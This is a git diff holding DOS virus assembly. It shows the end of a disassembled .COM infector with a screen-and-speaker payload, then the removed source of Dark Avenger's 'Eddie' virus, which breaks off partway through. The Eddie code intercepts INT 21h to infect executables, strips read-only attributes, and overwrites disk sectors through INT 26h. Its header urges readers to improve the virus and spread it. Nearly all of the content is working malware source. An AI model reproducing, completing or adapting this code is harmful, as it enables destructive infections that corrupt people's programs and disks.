BX,[SI+041Eh] ;00194 8B9C1E04 ____ - MOV CX,[SI+0420h] ;00198 8B8C2004 __ _ - CMP AX,[SI+0100h] ;0019C 3B840001 ;___ - JNZ H001AE ;001A0 750C u_ - CMP BX,[SI+0102h] ;001A2 3B9C0201 ;___ - JNZ H001AE ;001A6 7506 u_ - CMP CX,[SI+0104h] ;001A8 3B8C0401 ;___ - JZ H00212 ;001AC 7464 td -H001AE: MOV BX,[SI+0417h] ;001AE 8B9C1704 ____ - XOR CX,CX ;001B2 33C9 3_ - XOR DX,DX ;001B4 33D2 3_ - MOV AX,4202h ;001B6 B80242 __B - INT 21h ;2-Mov_Fl_Hdl_Ptr ;001B9 CD21 _! - SUB AX,0003h ;001BB 2D0300 -__ - MOV [SI+0412h],AX ;001BE 89841204 ____ - MOV BX,[SI+0417h] ;001C2 8B9C1704 ____ - MOV AX,5700h ;001C6 B80057 __W - INT 21h ;2-Fl_Hdl_Date_Time ;001C9 CD21 _! - PUSH CX ;001CB 51 Q - PUSH DX ;001CC 52 R - MOV BX,[SI+0417h] ;001CD 8B9C1704 ____ - MOV CX,0319h ;001D1 B91903 ___ - LEA DX,[SI+0100h] ;001D4 8D940001 ____ - MOV AH,40h ;001D8 B440 _@ - INT 21h ;2-Wr_Fl_Hdl ;001DA CD21 _! - MOV BX,[SI+0417h] ;001DC 8B9C1704 ____ - MOV CX,0003h ;001E0 B90300 ___ - LEA DX,[SI+0414h] ;001E3 8D941404 ____ - MOV AH,40h ;001E7 B440 _@ - INT 21h ;2-Wr_Fl_Hdl ;001E9 CD21 _! - MOV BX,[SI+0417h] ;001EB 8B9C1704 ____ - XOR CX,CX ;001EF 33C9 3_ - XOR DX,DX ;001F1 33D2 3_ - MOV AX,4200h ;001F3 B80042 __B - INT 21h ;2-Mov_Fl_Hdl_Ptr ;001F6 CD21 _! - MOV BX,[SI+0417h] ;001F8 8B9C1704 ____ - MOV CX,0003h ;001FC B90300 ___ - LEA DX,[SI+0411h] ;001FF 8D941104 ____ - MOV AH,40h ;00203 B440 _@ - INT 21h ;2-Wr_Fl_Hdl ;00205 CD21 _! - POP DX ;00207 5A Z - POP CX ;00208 59 Y - MOV BX,[SI+0417h] ;00209 8B9C1704 ____ - MOV AX,5701h ;0020D B80157 __W - INT 21h ;2-Fl_Hdl_Date_Time ;00210 CD21 _! -H00212: MOV BX,[SI+0417h] ;00212 8B9C1704 ____ - MOV AH,3Eh ;00216 B43E _> - INT 21h ;2-Close_Fl_Hdl ;00218 CD21 _! - RET ;RET_Near ;0021A C3 _ -;--------------------------------------------------- -H0021B: MOV AX,DS:[002Ch] ;0021B A12C00 _,_ - MOV ES,AX ;ES_Chg ;0021E 8EC0 __ - PUSH DS ;00220 1E _ - MOV AX,0040h ;00221 B84000 _@_ - MOV DS,AX ;DS_Chg ;00224 8ED8 __ - MOV BP,DS:[006Ch] ;00226 8B2E6C00 _.l_ - POP DS ;0022A 1F _ - TEST BP,0003h ;0022B F7C50300 ____ - JZ H00248 ;0022F 7417 t_ - XOR BX,BX ;00231 33DB 3_ - MOV AX,ES:[BX] ;ES_Ovrd ;00233 268B07 &__ - CMP AX,4150h ;00236 3D5041 =PA - JNZ H00243 ;00239 7508 u_ - CMP Word Ptr ES:[BX+02h],4854h - ;ES_Ovrd ;0023B 26817F025448 &___TH - JZ H0024E ;00241 740B t_ -H00243: INC BX ;00243 43 C - OR AX,AX ;00244 0BC0 __ - JNZ H00233 ;00246 75EB u_ -H00248: LEA DI,[SI+0428h] ;00248 8DBC2804 __(_ - JMP Short H00280 ;0024C EB32 _2 -;--------------------------------------------------- -H0024E: ADD BX,+05h ;0024E 83C305 ___ - LEA DI,[SI+0428h] ;00251 8DBC2804 __(_ - MOV AL,ES:[BX] ;ES_Ovrd ;00255 268A07 &__ - INC BX ;00258 43 C - OR AL,AL ;00259 0AC0 __ - JZ H00276 ;0025B 7419 t_ - CMP AL,3Bh ;0025D 3C3B <; - JZ H00266 ;0025F 7405 t_ - MOV [DI],AL ;00261 8805 __ - INC DI ;00263 47 G - JMP Short H00255 ;00264 EBEF __ -;--------------------------------------------------- -H00266: CMP Byte Ptr ES:[BX],00h - ;ES_Ovrd ;00266 26803F00 &_?_ - JZ H00276 ;0026A 740A t_ - SHR BP,1 ;0026C D1ED __ - SHR BP,1 ;0026E D1ED __ - TEST BP,0003h ;00270 F7C50300 ____ - JNZ H00251 ;00274 75DB u_ -H00276: CMP Byte Ptr [DI-01h],5Ch ;00276 807DFF5C _}_\ - JZ H00280 ;0027A 7404 t_ - MOV Byte Ptr [DI],5Ch ;0027C C6055C __\ - INC DI ;0027F 47 G -H00280: PUSH DS ;00280 1E _ - POP ES ;00281 07 _ - MOV [SI+0422h],DI ;00282 89BC2204 __"_ -;********* Put "*.COM" at ES:DI - MOV AX,2E2Ah ;00286 B82A2E _*. - STOSW ;00289 AB _ - MOV AX,4F43h ;0028A B8434F _CO - STOSW ;0028D AB _ - MOV AX,004Dh ;0028E B84D00 _M_ - STOSW ;00291 AB _ -;********** - PUSH ES ;00292 06 _ - MOV AH,2Fh ;00293 B42F _/ - INT 21h ;2-Get_DTA ;00295 CD21 _! - MOV AX,ES ;00297 8CC0 __ - MOV [SI+0424h],AX ;00299 89842404 __$_ - MOV [SI+0426h],BX ;0029D 899C2604 __&_ - POP ES ;002A1 07 _ - LEA DX,[SI+0478h] ;002A2 8D947804 __x_ - MOV AH,1Ah ;002A6 B41A __ - INT 21h ;1-Set_DTA ;002A8 CD21 _! - LEA DX,[SI+0428h] ;002AA 8D942804 __(_ - XOR CX,CX ;002AE 33C9 3_ - MOV AH,4Eh ;002B0 B44E _N - INT 21h ;2-Srch_1st_Fl_Hdl ;002B2 CD21 _! - JNB H002BE ;002B4 7308 s_ - XOR AX,AX ;002B6 33C0 3_ - MOV [SI+0428h],AX ;002B8 89842804 __(_ - JMP Short H002E7 ;002BC EB29 _) -;--------------------------------------------------- -H002BE: PUSH DS ;002BE 1E _ - MOV AX,0040h ;002BF B84000 _@_ - MOV DS,AX ;DS_Chg ;002C2 8ED8 __ - ROR BP,1 ;002C4 D1CD __ - XOR BP,DS:[006Ch] ;002C6 332E6C00 3.l_ - POP DS ;002CA 1F _ - TEST BP,0007h ;002CB F7C50700 ____ - JZ H002D7 ;002CF 7406 t_ - MOV AH,4Fh ;002D1 B44F _O - INT 21h ;2-Srch_Nxt_Fl_Hdl ;002D3 CD21 _! - JNB H002BE ;002D5 73E7 s_ -H002D7: MOV DI,[SI+0422h] ;002D7 8BBC2204 __"_ - LEA BX,[SI+0496h] ;002DB 8D9C9604 ____ - MOV AL,[BX] ;002DF 8A07 __ - INC BX ;002E1 43 C - STOSB ;002E2 AA _ - OR AL,AL ;002E3 0AC0 __ - JNZ H002DF ;002E5 75F8 u_ -H002E7: MOV BX,[SI+0426h] ;002E7 8B9C2604 __&_ - MOV AX,[SI+0424h] ;002EB 8B842404 __$_ - PUSH DS ;002EF 1E _ - MOV DS,AX ;DS_Chg ;002F0 8ED8 __ - MOV AH,1Ah ;002F2 B41A __ - INT 21h ;1-Set_DTA ;002F4 CD21 _! - POP DS ;002F6 1F _ - RET ;RET_Near ;002F7 C3 _ -;--------------------------------------------------- -H002F8: PUSH ES ;002F8 06 _ - MOV AX,[SI+040Fh] ;002F9 8B840F04 ____ - AND AX,0007h ;002FD 250700 %__ - CMP AX,0006h ;00300 3D0600 =__ - JNZ H0031A ;00303 7515 u_ - MOV AX,0040h ;00305 B84000 _@_ - MOV ES,AX ;ES_Chg ;00308 8EC0 __ - MOV AX,ES:[000Ch] ;ES_Ovrd ;0030A 26A10C00 &___ - OR AX,AX ;0030E 0BC0 __ - JNZ H0031A ;00310 7508 u_ - INC Word Ptr ES:[000Ch] - ;ES_Ovrd ;00312 26FF060C00 &____ - CALL H0031C ; . . . . . . . . . ;00317 E80200 ___ -H0031A: POP ES ;0031A 07 _ - RET ;RET_Near ;0031B C3 _ -;--------------------------------------------------- -H0031C: PUSH DS ;0031C 1E _ - MOV DI,0B800h ;0031D BF00B8 ___ - MOV AX,0040h ;00320 B84000 _@_ - MOV DS,AX ;DS_Chg ;00323 8ED8 __ - MOV AL,DS:[0049h] ;00325 A04900 _I_ - CMP AL,07h ;00328 3C07 <_ - JNZ H0032F ;0032A 7503 u_ - MOV DI,0B000h ;0032C BF00B0 ___ -H0032F: MOV ES,DI ;ES_Chg ;0032F 8EC7 __ - POP DS ;00331 1F _ - MOV BP,0FFF0h ;00332 BDF0FF ___ - MOV DX,0000h ;00335 BA0000 ___ - MOV CX,0010h ;00338 B91000 ___ - CALL H0037D ; . . . . . . . . . ;0033B E83F00 _?_ - INC DX ;0033E 42 B - LOOP H0033B ;0033F E2FA __ - CALL H0035A ; . . . . . . . . . ;00341 E81600 ___ - CALL H003C2 ; . . . . . . . . . ;00344 E87B00 _{_ - INC BP ;00347 45 E - CMP BP,+50h ;00348 83FD50 __P - JNZ H00335 ;0034B 75E8 u_ - CALL SILENC ; . . . . . . . . . ;0034D E80300 ___ - PUSH DS ;00350 1E _ - POP ES ;00351 07 _ - RET ;RET_Near ;00352 C3 _ -;--------------------------------------------------- -;********** Silence speaker -SILENC: IN AL,61h ;Port_IN:61h ;00353 E461 _a - AND AL,0FCh ;00355 24FC $_ - OUT 61h,AL ;Port_OUT:61h ;00357 E661 _a - RET ;RET_Near ;00359 C3 _ -;--------------------------------------------------- -H0035A: MOV DX,07D0h ;0035A BAD007 ___ - TEST BP,0004h ;0035D F7C50400 ____ - JZ H00366 ;00361 7403 t_ - MOV DX,0BB8h ;00363 BAB80B ___ -H00366: IN AL,61h ;Port_IN:61h ;00366 E461 _a - TEST AL,03h ;00368 A803 __ - JNZ H00374 ;0036A 7508 u_ - OR AL,03h ;0036C 0C03 __ - OUT 61h,AL ;Port_OUT:61h ;0036E E661 _a - MOV AL,0B6h ;00370 B0B6 __ - OUT 43h,AL ;Port_OUT:43h ;00372 E643 _C -H00374: MOV AX,DX ;00374 8BC2 __ - OUT 42h,AL ;Port_OUT:42h ;00376 E642 _B - MOV AL,AH ;00378 88E0 __ - OUT 42h,AL ;Port_OUT:42h ;0037A E642 _B - RET ;RET_Near ;0037C C3 _ -;--------------------------------------------------- -H0037D: PUSH CX ;0037D 51 Q - PUSH DX ;0037E 52 R - LEA BX,[SI+03BFh] ;0037F 8D9CBF03 ____ - ADD BX,DX ;00383 03DA __ - ADD DX,BP ;00385 01EA __ - OR DX,DX ;00387 0BD2 __ - JS H003BF ;00389 7834 x4 - CMP DX,+50h ;0038B 83FA50 __P - JNB H003BF ;0038E 732F s/ - MOV DI,0C80h ;00390 BF800C ___ - ADD DI,DX ;00393 03FA __ - ADD DI,DX ;00395 03FA __ - SUB DX,BP ;00397 29EA )_ - MOV CX,0005h ;00399 B90500 ___ - MOV AH,07h ;0039C B407 __ - MOV AL,[BX] ;0039E 8A07 __ - SUB AL,07h ;003A0 2C07 ,_ - ADD AL,CL ;003A2 02C1 __ - SUB AL,DL ;003A4 28D0 (_ - CMP CX,+05h ;003A6 83F905 ___ - JNZ H003B5 ;003A9 750A u_ - MOV AH,0Fh ;003AB B40F __ - TEST BP,0003h ;003AD F7C50300 ____ - JZ H003B5 ;003B1 7402 t_ - MOV AL,20h ;003B3 B020 _ -H003B5: STOSW ;003B5 AB _ - ADD BX,+10h ;003B6 83C310 ___ - ADD DI,009Eh ;003B9 81C79E00 ____ - LOOP H0039C ;003BD E2DD __ -H003BF: POP DX ;003BF 5A Z - POP CX ;003C0 59 Y - RET ;RET_Near ;003C1 C3 _ -;--------------------------------------------------- -H003C2: PUSH DS ;003C2 1E _ - MOV AX,0040h ;003C3 B84000 _@_ - MOV DS,AX ;DS_Chg ;003C6 8ED8 __ - MOV AX,DS:[006Ch] ;003C8 A16C00 _l_ - CMP AX,DS:[006Ch] ;003CB 3B066C00 ;_l_ - JZ H003CB ;003CF 74FA t_ - POP DS ;003D1 1F _ - RET ;RET_Near ;003D2 C3 _ -;--------------------------------------------------- - DB '"' ;003D3 22 -;--------------------------------------------------- - AND SP,[SI] ;SP_Chg ;003D4 2324 #$ - AND AX,2726h ;003D6 252627 %&' - SUB [BX+DI],CH ;003D9 2829 () - DB 66h ;Indef_OP:66h ;003DB 66 f -;--------------------------------------------------- - XCHG DI,[BP+DI] ;003DC 873B _; - SUB AX,2F2Eh ;003DE 2D2E2F -./ - XOR [BX+DI],DH ;003E1 3031 01 - AND SP,AX ;SP_Chg ;003E3 23E0 #_ - LOOPZ H003C9 ;003E5 E1E2 __ - JCXZ H003CD ;003E7 E3E4 __ - IN AX,0E6h ;Port_IN:E6h ;003E9 E5E6 __ - OUT 0E7h,AX ;Port_OUT:E7h ;003EB E7E7 __ - JMP H0EFDA ;003ED E9EAEB ___ -;--------------------------------------------------- - XOR [BX+DI],DH ;003F0 3031 01 - XOR AH,[SI] ;003F2 3224 2$ - LOOPNZ H003D7 ;003F4 E0E1 __ - LOOP H003DB ;003F6 E2E3 __ - CALL H0EE25 ; . . . . . . . . . ;003F8 E82AEA _*_ - OUT 0E8h,AX ;Port_OUT:E8h ;003FB E7E8 __ - JMP H0342F ;003FD E92F30 _/0 -;--------------------------------------------------- - DB 6Dh ;286_INSW ;00400 6D m -;--------------------------------------------------- - XOR DH,[BP+DI] ;00401 3233 23 - AND AX,0E2E1h ;00403 25E1E2 %__ - JCXZ H003EC ;00406 E3E4 __ - IN AX,0E7h ;Port_IN:E7h ;00408 E5E7 __ - OUT 0E8h,AX ;Port_OUT:E8h ;0040A E7E8 __ - JMP H0EFF9 ;0040C E9EAEB ___ -;--------------------------------------------------- - IN AL,DX ;Port_IN:DX ;0040F EC _ - IN AX,DX ;Port_IN:DX ;00410 ED _ - OUT DX,AL ;Port_OUT:DX ;00411 EE _ - OUT DX,AX ;Port_OUT:DX ;00412 EF _ - OUT 0E7h,AL ;ES_Ovrd ;00413 26E6E7 &__ - SUB [BX+DI+5Ah],BX ;00416 29595A )YZ - SUB AL,0ECh ;00419 2CEC ,_ - IN AX,DX ;Port_IN:DX ;0041B ED _ - OUT DX,AL ;Port_OUT:DX ;0041C EE _ - OUT DX,AX ;Port_OUT:DX ;0041D EF _ - DB 0F0h ;LOCK:F0h ;0041E F0 _ - XOR AH,[BP+SI+34] ;0041F 326234 2b4 -;--------------------------------------------------- - HLT ;SYSTEM_HALT ;00422 F4 _ - OR AL,[BX+SI] ;00423 0A00 __ - JMP H00439 ;00425 E91100 ___ -;--------------------------------------------------- - DB 0B4h, 09h, 0BAh ;First three bytes ;00428 - DB 05,00 ;Dunno ;0042B - DB 0B4h, 09h, 0BAh ;First three bytes ;0042D - ;AGAIN! Wierd -P00100 ENDP - -CODE ENDS - END H00100 - -;------------------------------------------------------------------------------- diff --git a/a/AVENGSRC (23).ASM b/a/AVENGSRC (23).ASM deleted file mode 100755 index a1cb9ff..0000000 --- a/a/AVENGSRC (23).ASM +++ /dev/null @@ -1,999 +0,0 @@ - - -Ok PAUL, Here is the file you requested, - - - -;************************ -;* * -;* E D D I E * -;* * -;* by Dark Avenger * -;* * -;* 3-JAN-1989 * -;* * -;* version 1.31x * -;* * -;************************ - -; "Blessed is he who expects nothing, for he shall not be disappointed." - -; The original source of one of the first Bulgarian viruses is in front of -; you. As you may notice, it's full of rubbish and bugs, but nevertheless -; the virus has spread surprisingly quickly troughout the country and made a -; quick round the globe. (It's well-known in Eastern and Western Europe, as -; well as in USA.) Due to the aniversary of its creation, the source is -; distributed freely. You have the rights to distribute the source which can -; be charged or free of charge, with the only condition not to modify it. -; The one, who intentionaly distributes this source modified in any way will -; be punished! Still, the author will be glad if any of you improves it and -; spreads the resulting executive file (i.e., the virus itself). Pay -; attention to the fact that after you assemble the source, the resulting -; .COM-file cannot be run. For that purpose you have to create a three-byte -; file, consisting of the hex numbers 0e9h, 68h, 0 and then to combine the -; two files. Don't try to place a JMP at the beginning of the source. - -; DISCLAIMER: The author does not take any responsability for any damage, -; either direct or implied, caused by the usage or not of this source or of -; the resulting code after assembly. No warrant is made about the product -; functionability or quality. - -; I cannot resist to express my special gratitude to my "populazer" Dipl. -; eng. Vesselin Bontchev, who makes me famous and who, wishing it or -; not, helps very much in the spreading of my viruses, in spite of the fact -; that he tries to do just the opposite (writing programs in C has never -; led to any good). -; Greetings to all virus writers! - -code segment - assume cs:code,ds:code -copyright: - db 'Eddie lives...somewhere in time!',0 -date_stamp: - dd 12239000h -checksum: - db 30 - -; Return the control to an .EXE file: -; Restores DS=ES=PSP, loads SS:SP and CS:IP. - - - - - -exit_exe: - mov bx,es - add bx,10h - add bx,word ptr cs:[si+call_adr+2] - mov word ptr cs:[si+patch+2],bx - mov bx,word ptr cs:[si+call_adr] - mov word ptr cs:[si+patch],bx - mov bx,es - add bx,10h - add bx,word ptr cs:[si+stack_pointer+2] - mov ss,bx - mov sp,word ptr cs:[si+stack_pointer] - db 0eah ;JMP XXXX:YYYY -patch: - dd 0 - -; Returns control to a .COM file: -; Restores the first 3 bytes in the -; beginning of the file, loads SP and IP. - -exit_com: - - - - - mov di,100h - add si,offset my_save - movsb - movsw - mov sp,ds:[6] ;This is incorrect - xor bx,bx - push bx - jmp [si-11] ;si+call_adr-top_file - -; Program entry point - -startup: - call relative -relative: - pop si ;SI = $ - sub si,offset relative - cld - cmp word ptr cs:[si+my_save],5a4dh - je exe_ok - cli - mov sp,si ;A separate stack is supported for - add sp,offset top_file+100h ;the .COM files, in order not to - sti ;overlap the stack by the program - cmp sp,ds:[6] - jnc exit_com -exe_ok: - push ax - push es - push si - push ds - mov di,si - -; Looking for the address of INT 13h handler in ROM-BIOS - - xor ax,ax - push ax - mov ds,ax - les ax,ds:[13h*4] - mov word ptr cs:[si+fdisk],ax - mov word ptr cs:[si+fdisk+2],es - mov word ptr cs:[si+disk],ax - mov word ptr cs:[si+disk+2],es - mov ax,ds:[40h*4+2] ;The INT 13h vector is moved to INT 40h - cmp ax,0f000h ;for diskettes if a hard disk is - jne nofdisk ;available - mov word ptr cs:[si+disk+2],ax - mov ax,ds:[40h*4] - mov word ptr cs:[si+disk],ax - mov dl,80h - mov ax,ds:[41h*4+2] ;INT 41h usually points the segment, - cmp ax,0f000h ;where the original INT 13h vector is - je isfdisk - cmp ah,0c8h - jc nofdisk - cmp ah,0f4h - jnc nofdisk - test al,7fh - jnz nofdisk - mov ds,ax - cmp ds:[0],0aa55h - jne nofdisk - mov dl,ds:[2] -isfdisk: - mov ds,ax - xor dh,dh - mov cl,9 - shl dx,cl - mov cx,dx - xor si,si -findvect: - lodsw ;Occasionally begins with: - cmp ax,0fa80h ; CMP DL,80h - jne altchk ; JNC somewhere - lodsw - cmp ax,7380h - je intchk - jne nxt0 -altchk: - cmp ax,0c2f6h ;or with: - jne nxt ; TEST DL,80h - lodsw ; JNZ somewhere - cmp ax,7580h - jne nxt0 -intchk: - inc si ;then there is: - lodsw ; INT 40h - cmp ax,40cdh - je found - sub si,3 -nxt0: - dec si - dec si -nxt: - dec si - loop findvect - jmp short nofdisk -found: - sub si,7 - mov word ptr cs:[di+fdisk],si - mov word ptr cs:[di+fdisk+2],ds -nofdisk: - mov si,di - pop ds - -; Check whether the program is present in memory: - - les ax,ds:[21h*4] - mov word ptr cs:[si+save_int_21],ax - mov word ptr cs:[si+save_int_21+2],es - push cs - pop ds - cmp ax,offset int_21 - jne bad_func - xor di,di - mov cx,offset my_size -scan_func: - lodsb - scasb - jne bad_func - loop scan_func - pop es - jmp go_program - -; Move the program to the top of memory: -; (it's full of rubbish and bugs here) - -bad_func: - pop es - mov ah,49h - int 21h - mov bx,0ffffh - mov ah,48h - int 21h - sub bx,(top_bz+my_bz+1ch-1)/16+2 - jc go_program - mov cx,es - stc - adc cx,bx - mov ah,4ah - int 21h - mov bx,(offset top_bz+offset my_bz+1ch-1)/16+1 - stc - sbb es:[2],bx - push es - mov es,cx - mov ah,4ah - int 21h - mov ax,es - dec ax - mov ds,ax - mov word ptr ds:[1],8 - call mul_16 - mov bx,ax - mov cx,dx - pop ds - mov ax,ds - call mul_16 - add ax,ds:[6] - adc dx,0 - sub ax,bx - sbb dx,cx - jc mem_ok - sub ds:[6],ax ;Reduction of the segment size -mem_ok: - pop si - push si - push ds - push cs - xor di,di - mov ds,di - lds ax,ds:[27h*4] - mov word ptr cs:[si+save_int_27],ax - mov word ptr cs:[si+save_int_27+2],ds - pop ds - mov cx,offset aux_size - rep movsb - xor ax,ax - mov ds,ax - mov ds:[21h*4],offset int_21;Intercept INT 21h and INT 27h - mov ds:[21h*4+2],es - mov ds:[27h*4],offset int_27 - mov ds:[27h*4+2],es - mov word ptr es:[filehndl],ax - pop es -go_program: - pop si - -; Smash the next disk sector: - - xor ax,ax - mov ds,ax - mov ax,ds:[13h*4] - mov word ptr cs:[si+save_int_13],ax - mov ax,ds:[13h*4+2] - mov word ptr cs:[si+save_int_13+2],ax - mov ds:[13h*4],offset int_13 - add ds:[13h*4],si - mov ds:[13h*4+2],cs - pop ds - push ds - push si - mov bx,si - lds ax,ds:[2ah] - xor si,si - mov dx,si -scan_envir: ;Fetch program's name - lodsw ;(with DOS 2.x it doesn't work anyway) - dec si - test ax,ax - jnz scan_envir - add si,3 - lodsb - -; The following instruction is a complete nonsense. Try to enter a drive & -; directory path in lowercase, then run an infected program from there. -; As a result of an error here + an error in DOS the next sector is not -; smashed. Two memory bytes are smashed instead, most probably onto the -; infected program. - - sub al,'A' - mov cx,1 - push cs - pop ds - add bx,offset int_27 - push ax - push bx - push cx - int 25h - pop ax - pop cx - pop bx - inc byte ptr [bx+0ah] - and byte ptr [bx+0ah],0fh ;It seems that 15 times doing - jnz store_sec ;nothing is not enough for some. - mov al,[bx+10h] - xor ah,ah - mul word ptr [bx+16h] - add ax,[bx+0eh] - push ax - mov ax,[bx+11h] - mov dx,32 - mul dx - div word ptr [bx+0bh] - pop dx - add dx,ax - mov ax,[bx+8] - add ax,40h - cmp ax,[bx+13h] - jc store_new - inc ax - and ax,3fh - add ax,dx - cmp ax,[bx+13h] - jnc small_disk -store_new: - mov [bx+8],ax -store_sec: - pop ax - xor dx,dx - push ax - push bx - push cx - int 26h - - -; The writing trough this interrupt is not the smartest thing, bacause it -; can be intercepted (what Vesselin Bontchev has managed to notice). - - pop ax - pop cx - pop bx - pop ax - cmp byte ptr [bx+0ah],0 - jne not_now - mov dx,[bx+8] - pop bx - push bx - int 26h -small_disk: - pop ax -not_now: - pop si - xor ax,ax - mov ds,ax - mov ax,word ptr cs:[si+save_int_13] - mov ds:[13h*4],ax - mov ax,word ptr cs:[si+save_int_13+2] - mov ds:[13h*4+2],ax - pop ds - pop ax - cmp word ptr cs:[si+my_save],5a4dh - jne go_exit_com - jmp exit_exe -go_exit_com: - jmp exit_com -int_24: - mov al,3 ;This instruction seems unnecessary - iret - -; INT 27h handler (this is necessary) - -int_27: - pushf - call alloc - popf - jmp dword ptr cs:[save_int_27] - -; During the DOS functions Set & Get Vector it seems that the virus has not -; intercepted them (this is a doubtfull advantage and it is a possible -; source of errors with some "intelligent" programs) - -set_int_27: - mov word ptr cs:[save_int_27],dx - mov word ptr cs:[save_int_27+2],ds - popf - iret -set_int_21: - mov word ptr cs:[save_int_21],dx - mov word ptr cs:[save_int_21+2],ds - popf - iret -get_int_27: - les bx,dword ptr cs:[save_int_27] - popf - iret -get_int_21: - les bx,dword ptr cs:[save_int_21] - popf - iret - -exec: - - - call do_file - call alloc - popf - jmp dword ptr cs:[save_int_21] - - db 'Diana P.',0 - -; INT 21h handler. Infects files during execution, copying, browsing or -; creating and some other operations. The execution of functions 0 and 26h -; has bad consequences. - -int_21: - push bp - mov bp,sp - push [bp+6] - popf - pop bp - pushf - call ontop - cmp ax,2521h - je set_int_21 - cmp ax,2527h - je set_int_27 - cmp ax,3521h - je get_int_21 - cmp ax,3527h - je get_int_27 - cld - cmp ax,4b00h - je exec - cmp ah,3ch - je create - cmp ah,3eh - je close - cmp ah,5bh - jne not_create -create: - cmp word ptr cs:[filehndl],0;May be 0 if the file is open - jne dont_touch - call see_name - jnz dont_touch - call alloc - popf - call function - jc int_exit - pushf - push es - push cs - pop es - push si - push di - push cx - push ax - mov di,offset filehndl - stosw - mov si,dx - mov cx,65 -move_name: - lodsb - stosb - test al,al - jz all_ok - loop move_name - mov word ptr es:[filehndl],cx -all_ok: - pop ax - pop cx - pop di - pop si - pop es -go_exit: - popf - jnc int_exit ;JMP -close: - cmp bx,word ptr cs:[filehndl] - jne dont_touch - test bx,bx - jz dont_touch - call alloc - popf - call function - jc int_exit - pushf - push ds - push cs - pop ds - push dx - mov dx,offset filehndl+2 - call do_file - mov word ptr cs:[filehndl],0 - pop dx - pop ds - jmp go_exit -not_create: - cmp ah,3dh - je touch - cmp ah,43h - je touch - cmp ah,56h ;Unfortunately, the command inter- - jne dont_touch ;preter does not use this function -touch: - call see_name - jnz dont_touch - call do_file -dont_touch: - call alloc - popf - call function -int_exit: - pushf - push ds - call get_chain - mov byte ptr ds:[0],'Z' - pop ds - popf -dummy proc far ;??? - ret 2 -dummy endp - -; Checks whether the file is .COM or .EXE. -; It is not called upon file execution. - -see_name: - push ax - push si - mov si,dx -scan_name: - lodsb - test al,al - jz bad_name - cmp al,'.' - jnz scan_name - call get_byte - mov ah,al - call get_byte - cmp ax,'co' - jz pos_com - cmp ax,'ex' - jnz good_name - call get_byte - cmp al,'e' - jmp short good_name -pos_com: - call get_byte - cmp al,'m' - jmp short good_name -bad_name: - inc al -good_name: - pop si - pop ax - ret - -; Converts into lowercase (the subroutines are a great thing). - -get_byte: - lodsb - cmp al,'C' - jc byte_got - cmp al,'Y' - jnc byte_got - add al,20h -byte_got: - ret - -; Calls the original INT 21h. - -function: - pushf - call dword ptr cs:[save_int_21] - ret - -; Arrange to infect an executable file. - -do_file: - push ds ;Save the registers in stack - push es - push si - push di - push ax - push bx - push cx - push dx - mov si,ds - xor ax,ax - mov ds,ax - les ax,ds:[24h*4] ;Saves INT 13h and INT 24h in stack - push es ;and changes them with what is needed - push ax - mov ds:[24h*4],offset int_24 - mov ds:[24h*4+2],cs - les ax,ds:[13h*4] - mov word ptr cs:[save_int_13],ax - mov word ptr cs:[save_int_13+2],es - mov ds:[13h*4],offset int_13 - mov ds:[13h*4+2],cs - push es - push ax - mov ds,si - xor cx,cx ;Arranges to infect Read-only files - mov ax,4300h - call function - mov bx,cx - and cl,0feh - cmp cl,bl - je dont_change - mov ax,4301h - call function - stc -dont_change: - pushf - push ds - push dx - push bx - mov ax,3d02h ;Now we can safely open the file - call function - jc cant_open - mov bx,ax - call disease - mov ah,3eh ;Close it - - call function -cant_open: - pop cx - pop dx - pop ds - popf - jnc no_update - mov ax,4301h ;Restores file's attributes - call function ;if they were changed (just in case) -no_update: - xor ax,ax ;Restores INT 13h and INT 24h - mov ds,ax - pop ds:[13h*4] - pop ds:[13h*4+2] - pop ds:[24h*4] - pop ds:[24h*4+2] - pop dx ;Register restoration - pop cx - pop bx - pop ax - pop di - pop si - pop es - pop ds - ret - -; This routine is the working horse. - -disease: - push cs - pop ds - push cs - pop es - mov dx,offset top_save ;Read the file beginning - mov cx,18h - mov ah,3fh - int 21h - xor cx,cx - xor dx,dx - mov ax,4202h ;Save file length - int 21h - mov word ptr [top_save+1ah],dx - cmp ax,offset my_size ;This should be top_file - sbb dx,0 - jc stop_fuck_2 ;Small files are not infected - mov word ptr [top_save+18h],ax - cmp word ptr [top_save],5a4dh - jne com_file - mov ax,word ptr [top_save+8] - add ax,word ptr [top_save+16h] - call mul_16 - add ax,word ptr [top_save+14h] - adc dx,0 - mov cx,dx - mov dx,ax - jmp short see_sick -com_file: - cmp byte ptr [top_save],0e9h - jne see_fuck - mov dx,word ptr [top_save+1] - add dx,103h - jc see_fuck - dec dh - xor cx,cx - -; Check if the file is properly infected - - -see_sick: - sub dx,startup-copyright - sbb cx,0 - mov ax,4200h - int 21h - add ax,offset top_file - adc dx,0 - cmp ax,word ptr [top_save+18h] - jne see_fuck - cmp dx,word ptr [top_save+1ah] - jne see_fuck - mov dx,offset top_save+1ch - mov si,dx - mov cx,offset my_size - mov ah,3fh - int 21h - jc see_fuck - cmp cx,ax - jne see_fuck - xor di,di -next_byte: - - lodsb - scasb - jne see_fuck - loop next_byte -stop_fuck_2: - ret -see_fuck: - xor cx,cx ;Seek to the end of file - xor dx,dx - mov ax,4202h - int 21h - cmp word ptr [top_save],5a4dh - je fuck_exe - add ax,offset aux_size+200h ;Watch out for too big .COM files - adc dx,0 - je fuck_it - ret - -; Pad .EXE files to paragraph boundary. This is absolutely unnecessary. - -fuck_exe: - mov dx,word ptr [top_save+18h] - neg dl - and dx,0fh - xor cx,cx - mov ax,4201h - int 21h - mov word ptr [top_save+18h],ax - mov word ptr [top_save+1ah],dx -fuck_it: - mov ax,5700h ;Get file's date - int 21h - pushf - push cx - push dx - cmp word ptr [top_save],5a4dh - je exe_file ;Very clever, isn't it? - mov ax,100h - jmp short set_adr -exe_file: - mov ax,word ptr [top_save+14h] - mov dx,word ptr [top_save+16h] -set_adr: - mov di,offset call_adr - stosw - mov ax,dx - stosw - mov ax,word ptr [top_save+10h] - stosw - mov ax,word ptr [top_save+0eh] - stosw - mov si,offset top_save ;This offers the possibilities to - movsb ;some nasty programs to restore - movsw ;exactly the original length - xor dx,dx ;of the .EXE files - mov cx,offset top_file - mov ah,40h - int 21h ;Write the virus - jc go_no_fuck ;(don't trace here) - xor cx,ax - jnz go_no_fuck - mov dx,cx - mov ax,4200h - int 21h - cmp word ptr [top_save],5a4dh - je do_exe - mov byte ptr [top_save],0e9h - mov ax,word ptr [top_save+18h] - add ax,startup-copyright-3 - mov word ptr [top_save+1],ax - mov cx,3 - jmp short write_header -go_no_fuck: - jmp short no_fuck - -; Construct the .EXE file's 